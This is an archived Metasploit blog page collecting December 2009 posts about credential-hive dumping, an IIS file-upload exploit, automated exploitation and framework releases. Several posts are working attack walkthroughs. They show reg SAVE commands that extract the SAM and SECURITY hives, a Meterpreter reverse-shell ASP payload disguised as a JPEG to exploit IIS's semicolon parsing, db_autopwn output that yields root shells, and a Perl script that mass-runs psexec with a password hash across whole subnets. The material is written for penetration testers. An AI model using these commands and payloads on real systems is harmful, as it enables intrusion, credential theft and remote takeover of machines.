Skip navigation
All Places > Metasploit > Blog > 2009 > December
2009

Originally Posted by hdm

 

 

Over the last few days, I have been playing with WinScanX, a free command-line tool for querying Windows service information over SMB. WinScanX combines many of the essential tools used during a penetration test into a single utility. One of the more interesting features is the "-y" flag, which instructs WinScanX to save a copy of the remote registry hives for SAM, SECURITY, and SYSTEM. These three hives can be used in conjunction with Cain and Abel or creddump to dump the LANMAN/NTLM hashes, view cached credentials, and decrypt LSA secrets. All very useful pieces of data for a penetration test.

 

The traditional way to obtain this information is by injecting a thread into the LSASS.exe process, calling various undocumented Windows APIs, and exporting the decrypted data back out. The problem with this method is that process injection is not necessarily reliable, especially when third-party security products interfere with the injection code. Any crash in the LSASS.exe process will force the OS to halt or reboot, which is far from stealthy and generally not what you want have happen to a client's domain controller during a penetration test. The injection method is implemented by pwdump, fgcache, cachedump, and the "hashdump" command in the Metasploit Meterpreter payload.

 

Since imitation is the sincerest form of flattery, I looked into how WinScanX implemented the registry hive export. Using the Remote Registry service over SMB/DCERPC, WinScanX calls the Save function, instructing the service to write an exported copy of the hive to the file system. WinScanX then downloads the hive using the ADMIN$ SMB share. This is a clean way to obtain the hive data, but newer versions of Windows disable the Remote Registry service by default, requiring the user to first enable it, then dump the hive, then disable it again. I would not be surprised if future versions of WinScanX implement this method.

 

In the context of Metasploit, we have the advantage of direct code execution on the target system, either through an exploit, or using psexec and a valid set of credentials. Instead of going through the Remote Registry service, it might be easier to run a local command in order to grab the registry hive. The command of choice for this is "reg.exe", included with Windows XP and all newer versions of the Windows operating system (missing from NT 4.0 and Windows 2000, but available as a separate download from Microsoft).

 

The "reg EXPORT" command can be used to take a copy of a specific piece of the registry; the EXPORT option generates human-readable output files that are easy to parse and can be imported into a new system for testing. Metasploit already uses "reg EXPORT" in various Meterpreter scripts, including "scraper.rb" and "winenum.rb". For capturing the HKLM\SYSTEM and HKLM\SAM hives, the EXPORT command works just fine, albeit the output files can get enormous. Trying to EXPORT the HKLM\SECURITY key (as Administrator), however, results in the following error:

 

C:\>reg EXPORT HKLM\SECURITY security.reg
ERROR: Access is denied.

 

The SECURITY tree is required to dump cached credentials and LSA secrets (but not password hashes) and without it, we would be missing two important pieces of data. Going back to WinScanX, we see that it uses the Save function, and reg.exe offers a SAVE command, lets try that instead of EXPORT:

 

C:\>reg SAVE HKLM\SECURITY security.hive
The operation completed successfully.

 

Hoorah! Even though the Administrator user does not have permission to read the HKLM\SECURITY key, reg.exe bypasses this restriction through the SAVE command. WinScanX uses the Save function call in the Remote Registry service, which likely calls the same backend function as reg.exe in this case. It looks like we have an easy way to grab the SECURITY hive from the command-line. This doesn't turn out to be quite the case, since this behavior changes depending on the version of Windows.

 

Edi Strosar came up with the following table based on his testing:

 

Windows 2000 SP4 (admin) = access denied
Windows XP SP2 (admin) = access denied
Windows XP SP3 (admin) = access denied
Windows 2003 R2 SP2 (admin) = works
Windows Vista SP2 (UAC/admin) = works
Windows 2008 SP1 (admin) = works
Windows 7 (UAC/admin) = works

 

This is an odd case of older versions of Windows actually having tighter restrictions than newer ones. Even though Windows 2000/XP don't exhibit this behavior, these platforms have the Remote Registry service enabled by default, so WinScanX can be used to grab the SECURITY hive anyways.

 

Keep in mind that using the raw hive file requires a tool that understands the raw registry format (Cain and Abel / creddump). In order for Metasploit to have support for cached credentials and LSA secrets, we will need to implement a registry parser in Ruby (creddump may be a good reference implementation). In the short-term, we can reimplement Meterpreter's "hashdump" to be purely registry-based. This will require SYSKEY code to be implemented, but this should be immediately feasible based on public documentation and the Ruby OpenSSL extension.

 

Thanks to Edi Strosar, Carlos Perez, and Mario Vilas for their feedback on the reg.exe SAVE issue.

 

-HD

Originally Posted by hdm

 

 

As of this afternoon, the msfencode command has the ability to emit ASP scripts that execute Metasploit payloads. This can be used to exploit the currently-unpatched file name parsing bug feature in Microsoft IIS. This flaw allows a user who can upload a "safe" file extension (jpg, png, etc) to upload an ASP script and force it to execute on the web server. The bug occurs when a file name is specified in the form of "evil.asp;.jpg" -- the application checks the file extension and sees "jpg", but the IIS server will stop parsing at the first ";" and sees "asp". The result is trivial code execution on any IIS server that allows users to choose the file name of their uploaded attachment.

 

For the following example, assume we have a web application that allows users to upload image files to the server. To complicate things, lets also assume that the application checks the file content to ensure that the uploaded file is a valid image. To exploit this, we need to generate an ASP script that drops a Meterpreter payload and configure a msfconsole instance to handle the session.

 

First we generate an ASP script that does a Meterpreter connect-back to the system running Metasploit:

 

$ msfpayload windows/meterpreter/reverse_tcp \
  LHOST=1.2.3.4 LPORT=8443 R | \
  msfencode -o evil.asp

 

Now we need to configure msfconsole to accept the incoming connection:

 

$ msfconsole
msf> use exploit/multi/handler
msf (handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf (handler) > set LHOST 1.2.3.4
msf (handler) > set LPORT 8443
msf (handler) > set ExitOnSession false
msf (handler) > exploit -j

 

To avoid the image content validator, we will prepend a valid JPG image to our ASP script:

 

$ cat happy.jpg evil.asp > "evil.asp;.jpg"

 

$ file "evil.asp;.jpg"
JPEG image data, JFIF standard 1.02

 

Now we upload our "evil.asp;.jpg" image to the web application. Since the extension ends in "jpg" and the contents of the file appear to be a valid JPEG, the web application accepts the file and renames it to "/images/evil.asp;.jpg"

 

Finally, we browse to the URL of the uploaded ASP/JPG, which will execute our payload and create a new session with the msfconsole:

 

[*] Starting the payload handler...
[*] Started reverse handler on port 8443
[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.xxx:8443 -> 66.234.xx.xx:1186)

 

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

 

meterpreter > shell
Process 2668 created.
Channel 1 created.
wMicrosoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

 

c:\windows\system32\inetsrv>whoami

 

nt authority\network service

Originally Posted by hdm

 

 

Even though Metasploit 3.3.3 was just released on December 23rd, the holidays provided some free time for the community and the development team to add more shiny to the Metasploit Framework.

 

Metasploit now has the ability to discover, brute force, and query MySQL database servers. This was a multi-pronged effort led by Bernardo Damele A. G, combined with TOMITA Masahiro's pure Ruby MySQL driver, tweaked by myself, and concisely documented by Carlos Perez. We will continue to improve MySQL exploitation support by borrowing some of the other techniques that Bernardo implemented in SQLMap (UDFs, upload, download).

 

SunRPC support and NFS export scanning has been improved due to a series of patches from Ty Bodell. Expect to see more work around SunRPC and NFS in the future as we start porting more RPC exploits and automate the exploitation of weak NFS exports.

 

The database backend in Metasploit is going through some major changes; most recently, the report*() functions were modified to append to a queue as opposed to directly inserting data into the database. This solves a large number of performance problems and concurrency issues. This change ties in to the work by James Lee and Mike Smith in version 3.3.3 and has been integrated with the most of the existing auxiliary/scanner/ modules. For the average user, this means that once a database has been configured, modules will start automatically saving their results as they run.

 

We added a NetBIOS name scanner that can retrieve the hostname, domain, and ethernet mac address of any machine running NetBIOS services (Windows, Samba). What makes this module unique is that it sends a second probe to each host, targeted at the NetBIOS hostname, asking for a list of IP addresses to which that name is bound. This effectively provides a way to enumerate all IP addresses of a Windows or Unix machine (running Samba) with just two UDP packets. This technique allows for the identification of VPN clients, VMWare virtual networks, wireless links, and multi-homed hosts. The examples below demonstrate this module and some of the results that can be found while using it.

 

msf> use auxiliary/scanner/netbios/nbname
msf auxiliary(nbname) > set RHOSTS 192.168.0.0/24
msf auxiliary(nbname) > run

 

[*] Sending NetBIOS status requests to 192.168.0.0->192.168.0.255

 

[*] 192.168.0.142 [WIN7SONY] OS:Windows
Names:(WIN7SONY, WORKGROUP)
Addresses:(192.168.0.142, 192.168.50.1, 192.168.6.1)
Mac:00:1d:ba:xx:xx:xx

 

[*] 192.168.0.2 [STORAGE] OS:Unix
Names:(STORAGE, WORKGROUP)
Addresses:(192.168.0.2, 66.194.xx.xx)
Mac:00:00:00:00:00:00

 


This example shows a Windows 7 machine running VMware Workstation (the two additional IP addresses) and an Ubuntu Linux system running Samba with both an internal and external IP address. An external machine running Samba with multiple interfaces would look something like:

 

[*] 66.240.xx.xx [DBxxxxxx] OS:Unix
Names:(DBxxxxxx, __MSBROWSE__)
Addresses:(66.240.xx.xx, 71.6.yy.yy, 71.6.zz.zz)
Mac:00:00:00:00:00:00

 

The sweep_udp module has been updated to parse out the NetBIOS status information but doesn't send the secondary probe to obtain the IP address list.

 

Last but not least, we have added a number of new exploits and auxiliary modules to the tree since version 3.3.3 was released. These exploits include file format modules for Media Jukebox and Mini-stream as well as a remote exploit for HP Recovery Manager's Omni-Inet service.

Originally Posted by hdm

 

 

This morning we released version 3.3.3 of the Metasploit Framework - this release focuses on  exploit rankings, session automation, and bug fixes. The exploit rank indicates how reliable the exploit is and how likely it is for the exploit to have a negative impact on the target system. This ranking can be used to  prevent exploits below a certain rank from being used and limit the impact to a particular target.

 

The most basic use of ranking is the search command - this command now accepts the "-r" parameter, which takes an argument indicating the minimum ranking value to show. Valid ranks are excellent, great, good, normal, average, low, and manual. The exploit rankings page goes into greater detail on what these levels actually mean. The following command would show all modules ranked as "great" or better:

 

msf> search -r great

 

From the console, the MinimumRank global option can be used to prevent less-reliable exploits from being run by accident. The following commands demonstrate this feature:

 

msf> setg MinimumRank excellent
msf> use exploit/windows/smb/ms08_067_netapi

 

msf (exploit/ms08_067_netapi) > exploit

 

[-] This exploit is below the minimum rank, 'excellent'.
[-] If you really want to run it, do 'exploit -f' or
[-] setg MinimumRank to something lower ('manual' is
[-] the lowest and would allow running all exploits).

 

The exploit automation features in Metasploit have been updated to accept a minimum rank value as well. From the Metasploit Framework NeXpose Plugin or db_autopwn commands, the "-R" parameter can be used to specify the minimum rank. This instructs the exploit matching algorithm to only run exploits with that rank or better, which not only speeds up the exploit process, but reduces the chance that the target machines and services will crash. The example below shows db_autopwn being used with a NeXpose scan import to only target vulnerabilities where the exploit is ranked excellent:

 

msf exploit(psexec) > db_autopwn -b -x -t         
[*]   XX.YY.44.223:1220  exploit/unix/webapp/qtss_parse_xml_exec  (CVE-2003-0050, BID-6954)
[*]   XX.YY.41.188:445  exploit/windows/smb/ms08_067_netapi  (NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos)
[*]   XX.YY.77.234:445  exploit/windows/smb/psexec  (CVE-1999-0504, CVE-1999-0504, CVE-1999-0504, CVE-1999-0504)
[*]   XX.YY.47.203:445  exploit/windows/smb/ms08_067_netapi  (NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos)
[*]   XX.YY.37.182:139  exploit/osx/samba/lsa_transnames_heap  (CVE-2007-2446, OSVDB-34699)
[*]   XX.YY.32.2:445  exploit/osx/samba/lsa_transnames_heap  (CVE-2007-2446, OSVDB-34699)
[*]   XX.YY.35.195:445  exploit/windows/smb/psexec  (CVE-1999-0504, CVE-1999-0504, CVE-1999-0504, CVE-1999-0504)
[*]   XX.YY.32.2:139  exploit/osx/samba/lsa_transnames_heap  (CVE-2007-2446, OSVDB-34699)
[*]   XX.YY.44.223:139  exploit/solaris/samba/trans2open  (CVE-2003-0201, BID-7294)
[*]   XX.YY.44.223:139  exploit/multi/samba/nttrans  (CVE-2003-0085, BID-7106)
[*]   XX.YY.47.203:135  exploit/windows/dcerpc/ms03_026_dcom  (CVE-2003-0352, BID-8205)
[*]   XX.YY.47.203:445  exploit/windows/smb/ms06_040_netapi  (CVE-2006-3439)
[*]   XX.YY.72.243:445  exploit/windows/smb/ms08_067_netapi  (NEXPOSE-dcerpc-ms-netapi-netpathcanonicalize-dos)
[*]   XX.YY.72.243:445  exploit/windows/smb/ms06_040_netapi  (CVE-2006-3439)
[*]   XX.YY.37.182:445  exploit/osx/samba/lsa_transnames_heap  (CVE-2007-2446, OSVDB-34699)
[*]   XX.YY.34.236:135  exploit/windows/dcerpc/ms03_026_dcom  (CVE-2003-0352, BID-8205)
[*]   XX.YY.41.188:135  exploit/windows/dcerpc/ms03_026_dcom  (CVE-2003-0352, BID-8205)
[*]   XX.YY.41.188:445  exploit/windows/smb/ms06_040_netapi  (CVE-2006-3439)

 


msf exploit(psexec) > db_autopwn -b -x -t -R excellent
[*]   XX.YY.44.223:1220  exploit/unix/webapp/qtss_parse_xml_exec  (CVE-2003-0050, BID-6954)
[*]   XX.YY.77.234:445  exploit/windows/smb/psexec  (CVE-1999-0504, CVE-1999-0504, CVE-1999-0504, CVE-1999-0504)
[*]   XX.YY.35.195:445  exploit/windows/smb/psexec  (CVE-1999-0504, CVE-1999-0504, CVE-1999-0504, CVE-1999-0504)

 


msf exploit(psexec) > db_autopwn -b -x -R excellent -e
[*] (1/3 [0 sessions]): Launching exploit/unix/webapp/qtss_parse_xml_exec against XX.YY.44.223:1220...
[*] (2/3 [0 sessions]): Launching exploit/windows/smb/psexec against XX.YY.77.234:445...
[*] (3/3 [0 sessions]): Launching exploit/windows/smb/psexec against XX.YY.35.195:445...
[*] (3/3 [0 sessions]): Waiting on 3 launched modules to finish execution...
[*] Command shell session 1 opened (192.168.198.128:45146 -> XX.YY.44.223:32554)
[*] (3/3 [1 sessions]): Waiting on 1 launched modules to finish execution...
[*] (3/3 [1 sessions]): Waiting on 1 launched modules to finish execution...
[*] The autopwn command has completed with 1 sessions

 


Active sessions
===============
  Id Description Tunnel Via
  --  -----------  ------  ---
  1   Command shell  192.168.198.128:45146 -> XX.YY.44.223:32554  unix/webapp/qtss_parse_xml_exec

 

msf exploit(psexec) > sessions -i 1
[*] Starting interaction with 1...

 

uname -a
Darwin mactgts 5.5 Darwin Kernel Version 5.5: Thu May 30 14:51:26 PDT 2002; root:xnu/xnu-201.42.3.obj~1/RELEASE_PPC  Power Macintosh powerpc

 

id
uid=0(root) gid=0(wheel) groups=0(wheel)

Originally Posted by Jabra

 

 

Metasploit's pexec module is one of my favorite modules. It does exactly what I need and it does it really well. One thing I wish that Metasploit had, is a scanner version of the psexec exploit module. So I decided to build my own with Perl. 

Okay, assume we have the following networks: 192.168.1.0/24, 192.168.2.0/24 etc etc... We know the local admin account is Administrator and the hash for the account is ADMINISTRATOR:HASH. 

First, we build a small Perl script to generate a configuration file:

 

#!/usr/bin/perl -w
use strict;
print "use windows/smb/psexec\n";
print "set SMBUser Administrator\n";
print "set SMBPass ADMINISTRATOR:HASH\n";
print "set PAYLOAD windows/meterpreter/bind_tcp\n";
# first range

foreach(1.. 254) {
  print "set RHOST 192.168.1.$_\n";
  print "exploit\n";
  print "sleep 2\n";
}
# second range

foreach(1.. 254) {
  print "set RHOST 192.168.2.$_\n";
  print "exploit\n";
  print "sleep 2\n";
}

Once we have this script built, we simply execute it and save the result to a file named psexec.rc.

 

perl psexec-192-168.pl > psexec.rc

 

Lastly, we leverage Metasploit's ability to execute commands passed into meterpreter via an resource file. Once Metasploit loads psexc.rc, it will execute all of the commands we generated using the Perl script. This basically gives us a nice way to create an exploit scanner.

 

msfconsole -r psexec.rc

 

Loading psexec.rc will exploit all of the systems within the networks specified and the result will be tons and tons of shells. 

Regards,
Jabra

Originally Posted by hdm

 

 

Last week we released Metasploit 3.3.2 following on the heels of Metasploit 3.3.1. This release marked a major change to how the Meterpreter backend processed commands; instead of running each request serially, the Meterpreter now spawns a background thread for each request. This allows for multiple scripts to access the same Meterpreter instance at the same time and vastly improves the pivoting functionality. Version 3.3.2 also added support for a standards-compliant XMLRPC server, enhanced the NeXpose Plugin, updated the Oracle mixins, cleaned up the database backend, and fixed 45 bugs. Rapid7 also released an update for NeXpose Community Edition that provides PDF and HTML reporting and adds vulnerability checks for the past Microsoft Tuesday.

 

We plan to release version 3.3.3 before the end of the year, with a focus on exploit ranking, improving the WMAP web scanner, and expanding our WiFi functionality through Lorcon2.

 

For those unfamiliar with WMAP, think of it as a web app scanner that has been deconstructed into individual tests. Every security test performed by WMAP can be executed as part of an automated scan or manually as an auxiliary module. Data from one type of scanner module can be fed into another type, which in turn gathers even more data, and so on. The slick part is that these modules have access to the entire Metasploit API, including exploits, payloads, and protocol stacks. It is completely possible to write a WMAP analysis module that leverages information from a web application to compromise another system (using leaked MSSQL credentials, etc). Recent (post 3.3.2) updates to WMAP included a massively expanded directory scanner (based on metasploit.com's own web logs) and updates to the underlying database schema.

 

On the wireless front, Metasploit has had hostile AP and wireless driver (ring-0) exploits for many years, but until recently we had no way to watch WiFi traffic and interact with a specific device. With the introduction of Lorcon2 support in Metasploit 3.3, we can now port nearly any WiFi tool to a Metasploit module. Mike Kershaw has demonstrated this by porting airpwn and dnspwn to Metasploit, providing great examples of how to use the new API.

 

As always, the best way to follow development is to watch the activity log from the Metasploit tracker. The last few months have been a whirlwind of development, but the really fun stuff is yet to come :)

Originally Posted by hdm

 

 

On December 1st, Rapid7 announced the Community Edition of the NeXpose vulnerability management product. At the same time, we released version 3.3.1 of the Metasploit Framework, which contains the first step towards full integration between NeXpose and Metasploit. Since the release, we have made some major improvements based on community feedback and I wanted to take a minute to walk through some of the new features.

 

The Community Edition of NeXpose is based on the same product as the enterprise versions, but it does have a few restrictions. The community license limits the number of managed IPs to 32, disables web application scanning, and doesn't provide configurable scan templates or discovery mode. The Community Edition does not include commercial support, but a Community Portal has been setup to answer common questions and promote discussion around the product. Other than that, it is essentially an enterprise-grade vulnerability management solution available at no cost.

 

The Metasploit integration is implemented through the NeXpose Plugin. This plugin can be loaded from the Metasploit console and provides the ability to launch vulnerability scans and automatically import the results using a NeXpose instance (either local or remote). Commercial penetration testing tools have had support for importing vulnerability data for a long time, but these products have left the vulnerability assessment and data import steps as a manual process.

 

The NeXpose plugin not only combines these steps into a single command, but it can also automatically launch exploit modules after the scan is completed. As of update r7681 this plugin can also launch scans based on a existing database results, such as those imported through Nmap and other tools. Even if you don't actually use Metasploit on a day-to-day basis, this plugin can be useful in that it tells you what Metasploit modules could potentially compromise a target and help prioritize remediation efforts.

 

For more information on the NeXpose plugin, including a walkthrough on using the plugin to automatically scan and compromise a target, please see the Quick Start Guide on the Metasploit wiki.

Filter Blog

By date: By tag: